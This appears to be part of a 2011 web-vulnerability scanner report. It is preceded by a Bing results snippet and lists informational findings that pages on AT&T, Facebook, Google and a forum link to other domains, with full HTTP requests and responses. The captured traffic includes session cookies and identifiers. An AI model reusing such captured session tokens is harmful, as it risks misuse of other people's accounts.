<h3><a href="http://www.prlog.org/11463569-the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management.html" onmousedown="return si_T('&amp;ID=SERP,5104.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<div><a href="http://www.expatica.com/nl/essentials_moving_to/essentials/Working-in-the-Netherlands_13058.html" onmousedown="return si_T('&amp;ID=SERP,5306.1')"><img height="80" id="fdemb_0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7" title="Working in the Netherlands (part I) - Expatica" width="80" />
...[SNIP]...
<h5><a href="http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php" onmousedown="return si_T('&amp;ID=SERP,5311.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<h5><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5314.1')">The Netherlands #1 Real Estate Company Selects <strong>
...[SNIP]...
<h5><a href="http://www.melodika.net/index.php?option=com_content&amp;task=view&amp;id=150446&amp;Itemid=55" onmousedown="return si_T('&amp;ID=SERP,5317.1')">Outpost24 Extends International Presence to the APAC Region</a>
...[SNIP]...
<h3><a href="http://www.outpost24.com/products-outscan-pci.html" onmousedown="return si_T('&amp;ID=SERP,5132.1')"><strong>
...[SNIP]...
<h3><a href="http://news.thomasnet.com/companystory/Outpost24-AB-Releases-a-Major-Update-to-OUTSCAN-804065" onmousedown="return si_T('&amp;ID=SERP,5151.1')">Outpost24 AB Releases a Major Update to <strong>
...[SNIP]...
<h3><a href="http://www.outpost24.dk/solutions-pci-compliance.html" onmousedown="return si_T('&amp;ID=SERP,5179.1')">PCI Compliance | Solutions | Outpost24</a>
...[SNIP]...
<h3><a href="http://chartsaver.com/" onmousedown="return si_T('&amp;ID=SERP,5201.1')"><strong>
...[SNIP]...
<h3><a href="https://community.mcafee.com/thread/16756" onmousedown="return si_T('&amp;ID=SERP,5219.1')">McAfee Communities: Error Loading Outlook 2007 ...</a>
...[SNIP]...
<h3><a href="http://world-scan.com/" onmousedown="return si_T('&amp;ID=SERP,5247.1')">Document Management from World-SCAN, Inc.</a>
...[SNIP]...
<h3><a href="http://www.immunesecurity.com/" onmousedown="return si_T('&amp;ID=SERP,5275.1')">ImmuneSecurity - SIEM</a>
...[SNIP]...
<h5><a href="http://www.1888pressrelease.com/the-netherlands-1-real-estate-website-relies-on-outscan-for-pr-298443.html" onmousedown="return si_T('&amp;ID=SERP,5293.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<h5><a href="http://www.1888pressrelease.com/gerstein-global-futures-expands-e-commerce-in-asia-pacific-u-pr-298444.html" onmousedown="return si_T('&amp;ID=SERP,5294.1')">Gerstein Global Futures Expands e-Commerce in Asia Pacific...</a>
...[SNIP]...
<h5><a href="http://www.openpr.com/news/173022/Risk-based-Auditing-Workshop-at-the-12th-Annual-Regional-Gulf-Audit-Conference.html" onmousedown="return si_T('&amp;ID=SERP,5295.1')">Risk-based Auditing Workshop at the 12th Annual Regional...</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,103.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,105.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,107.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,109.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,111.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=outscan&amp;P3=cfcache&amp;P4=QBRE&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dvulnerability%2bmanagement%26go%3d%26form%3dQBLH%26qs%3dn%26sk%3d%26sc%3d8-0&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3doutscan%26go%3d%26qs%3dn%26sk%3d%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,113.1')">Tell us what you think</a>
...[SNIP]...
23.57. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
</h1>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ" type="text/javascript"></script>
...[SNIP]...
</a>
<a href="http://www.sbc.com/gen/privacy-policy?pid=2587">&copy; 2011 AT&amp;T Intellectual Property</a>
...[SNIP]...
<noscript><img height="1" width="1" src="http://view.atdmt.com/action/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]" /></noscript>
...[SNIP]...
23.58. https://www.crankyape.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
23.59. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
23.60. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CB4QFjAB&url=https%3A%2F%2Fwww.onlinemicrofiche.com%2Fxtremepowersports%2Fshoppingcart%2FCheckOut%2FViewcart.asp&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGvnR0gucACG5iXNsoiJjP3yTYNhw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:50 GMT
Server: gws
Content-Length: 282
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp">here</A>
...[SNIP]...
23.61. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=7&ved=0CEIQFjAG&url=http%3A%2F%2Fwww.seoq.com%2Fwebstatshq%2Fwww.onlinemicrofiche.com&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNEGnqVPSypVD2ZgFZB-lziIemYxVA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:05:03 GMT
Server: gws
Content-Length: 252
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.seoq.com/webstatshq/www.onlinemicrofiche.com">here</A>
...[SNIP]...
23.62. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCQQFjAC&url=http%3A%2F%2Fwww.hlsm.com%2F&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNHePIAL4GdKxUsNHy8GmTvKxJDkXw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.hlsm.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:52 GMT
Server: gws
Content-Length: 217
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.hlsm.com/">here</A>.
...[SNIP]...
23.63. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=6&ved=0CDQQFjAF&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Farchive%2Findex.php%2Ft-126285.html&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGfzGiacNnYa_pzX26LSRWsrMYtJg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.greenhulk.net/forums/archive/index.php/t-126285.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:58 GMT
Server: gws
Content-Length: 260
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.greenhulk.net/forums/archive/index.php/t-126285.html">here</A>
...[SNIP]...
23.64. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=8&ved=0CEgQFjAH&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNHIO48l3NhH3kxC5IKXlFbwtTGdDw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://websiteprice.net/result/?id=65934
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:05:05 GMT
Server: gws
Content-Length: 237
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://websiteprice.net/result/?id=65934">here</A>
...[SNIP]...
23.65. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CCcQFjAD&url=http%3A%2F%2Fwww.ronnies.com%2Fmicro.htm&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGQM5H2pASRtblCVHFOW4syZdI9Og HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.ronnies.com/micro.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:53 GMT
Server: gws
Content-Length: 229
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.ronnies.com/micro.htm">here</A>
...[SNIP]...
23.66. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CBgQFjAA&url=https%3A%2F%2Fwww.onlinemicrofiche.com%2FWPS%2Fshoppingcart%2Fcheckout%2FViewcart.asp%3Fexpand%3D1019&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNG1VYlna-u1E1GJSAOhTiuuydh9jA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:48 GMT
Server: gws
Content-Length: 280
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019">here</A>
...[SNIP]...
23.67. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=5&ved=0CC4QFjAE&url=http%3A%2F%2Fbizinformation.co%2Fwww.onlinemicrofiche.com&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNEc-tzrcYttnNN7062O5lPKoPU8QQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://bizinformation.co/www.onlinemicrofiche.com
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:56 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://bizinformation.co/www.onlinemicrofiche.com">here</A>
...[SNIP]...
23.68. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://www.amsoil.com/redirect.cgi?zo=1499968&page=index'><img src='images/amsoil.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://pwcperformance.com'><img src='images/performance.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm'><img src='images/oe.gif' />
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
